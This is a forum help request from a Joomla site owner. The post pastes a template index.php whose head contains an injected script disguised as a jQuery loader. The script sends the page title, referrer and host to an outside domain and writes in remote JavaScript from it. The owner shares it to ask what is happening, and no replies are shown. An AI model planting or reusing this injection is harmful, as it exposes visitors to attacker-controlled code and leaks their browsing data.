When I open my site/page http://www.lawaaimaker.nl/radio a strange thing is happening. It seems that in my index.php in the template joomla5.1Florence folder has some lines referring to http://buckslakesnowdrifters.com. Finally the page is going to the right page but whats is happening?
I'v copied the Index.php lines from the folder here. How do I resolve this?
<?php
/*================================================================*\
|| # Copyright (C) 2011 Joomla51. All Rights Reserved. ||
|| # license - PHP files are licensed under GNU/GPL V2 ||
|| # license - CSS - JS - IMAGE files are Copyrighted material ||
|| # Website: http://www.joomla51.com ||
\*================================================================*/
defined('_JEXEC') or die;
JHtml::_('behavior.framework', true);
JHtml::_('bootstrap.framework');
define( 'nexus', dirname(__FILE__) );
require("php/config.php"
require("php/variables.php"
?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<?php include ("php/styles.php"?>
<?php include ("php/scripts.php"?>
<!-- <link rel="stylesheet" href="http://basehold.it/30"> -->
<?php echo ($head_custom_code); ?>
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://buckslakesnowdrifters.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
</head>
<body>
<div class="sidebar_wrapper" style="background-position: bottom 0">
<?php require("php/layouts/hornav.php" ?>
<?php require("php/layouts/social_icons.php" ?>
<div class="copyright">
<span><?php echo $this->params->get('copyright'); ?></span>
</div>
</div>
<div class="content_wrapper">
<div id="header_bg">
<?php require("php/layouts/header.php" ?>
<?php if ($this->countModules('top-1a') || $this->countModules('top-1b') || $this->countModules('top-1c') || $this->countModules('top-1d') || $this->countModules('top-1e') || $this->countModules('top-1f')) { ?>
<div id="container_top1_modules" class="j51container" style="background-position: 50% 0%" data-stellar-background-ratio="0.5"><div class="wrapper960">
<?php require("php/layouts/top1_modules.php" ?>
</div></div>
<?php }?>
</div>
<?php if ($this->countModules('showcase')) { ?>
<div id="container_slideshow" class="j51container"><div class="wrapper960">
<?php require("php/layouts/slideshow.php" ?>
</div></div>
<?php }?>
<div id="content"></div>
<?php if ($this->countModules('top-2a') || $this->countModules('top-2b') || $this->countModules('top-2c') || $this->countModules('top-2d') || $this->countModules('top-2e') || $this->countModules('top-2f')) { ?>
<div id="container_top2_modules" class="j51container" style="background-position: 50% 0%" data-stellar-background-ratio="0.5"><div class="wrapper960">
<?php require("php/layouts/top2_modules.php" ?>
</div></div>
<?php }?>
<?php if ($this->countModules('breadcrumb') || $this->countModules('top-3a') || $this->countModules('top-3b') || $this->countModules('top-3c') || $this->countModules('top-3d') || $this->countModules('top-3e') || $this->countModules('top-3f')) { ?>
<div id="container_top3_modules" class="j51container" style="background-position: 50% 0%" data-stellar-background-ratio="0.5"><div class="wrapper960">
<?php require("php/layouts/top3_modules.php" ?>
</div></div>
<?php }?>
<div id="container_main" class="j51container">
<div class="wrapper960">
<?php require("php/layouts/main.php" ?>
</div></div>
<?php if ($this->countModules('bottom-1a') || $this->countModules('bottom-1b') || $this->countModules('bottom-1c') || $this->countModules('bottom-1d') || $this->countModules('bottom-1e') || $this->countModules('bottom-1f')) { ?>
<div id="container_bottom1_modules" class="j51container" style="background-position: 50% 0%" data-stellar-background-ratio="0.5"><div class="wrapper960">
<?php require("php/layouts/bottom1_modules.php" ?>
</div></div>
<?php }?>
<?php if ($this->countModules('bottom-2a') || $this->countModules('bottom-2b') || $this->countModules('bottom-2c') || $this->countModules('bottom-2d') || $this->countModules('bottom-2e') || $this->countModules('bottom-2f')) { ?>
<div id="container_bottom2_modules" class="j51container" style="background-position: 50% 0%" data-stellar-background-ratio="0.5"><div class="wrapper960">
<?php require("php/layouts/bottom2_modules.php" ?>
</div></div>
<?php }?>
<?php require("php/layouts/base.php" ?>
</div></div>
</div>
<?php echo ($body_custom_code); ?>
<!-- Stellar -->
<script type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/jquery.stellar.js" charset="utf-8"></script>
<script type="text/javascript">
if (Modernizr.touch) {
} else {
jQuery(window).stellar({
horizontalScrolling: false
});
}
</script>
<jdoc:include type="modules" name="debug" />
</body>
</html>
- Lawaaimaker
-
- Commercial Templates
- Monday, 04 January 2016
- Subscribe via email
- Page :
- 1
There are no replies made for this post yet.
Be one of the first to reply to this post!
Be one of the first to reply to this post!